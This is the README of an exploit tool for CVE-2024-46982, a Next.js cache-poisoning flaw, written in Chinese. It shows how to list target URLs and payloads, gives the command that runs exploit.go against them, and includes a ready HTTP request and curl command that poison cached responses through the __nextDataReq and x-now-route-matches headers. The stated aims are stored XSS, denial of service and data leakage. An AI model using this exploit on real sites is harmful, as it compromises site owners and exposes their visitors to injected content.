该工具可自动检测并利用 CVE-2024-46982,这是 Next.js 中的一个缓存投毒漏洞,服务端渲染(SSR)响应可能被错误地缓存为静态站点生成(SSG)响应。此类配置错误可能导致存储型 XSS、DoS 和数据泄露,使攻击者能够向缓存响应中注入恶意内容。
创建一个名为 targets.txt 的文件,每行包含一个目标 URL:
https://vulnerable-site.com
https://another-target.com
创建一个名为 payloads.txt 的文件,其中包含将通过 User-Agent 请求头注入的 Payload:
使用以下命令编译并执行漏洞利用:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
使用 curl 发送恶意请求:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
在浏览器中访问该端点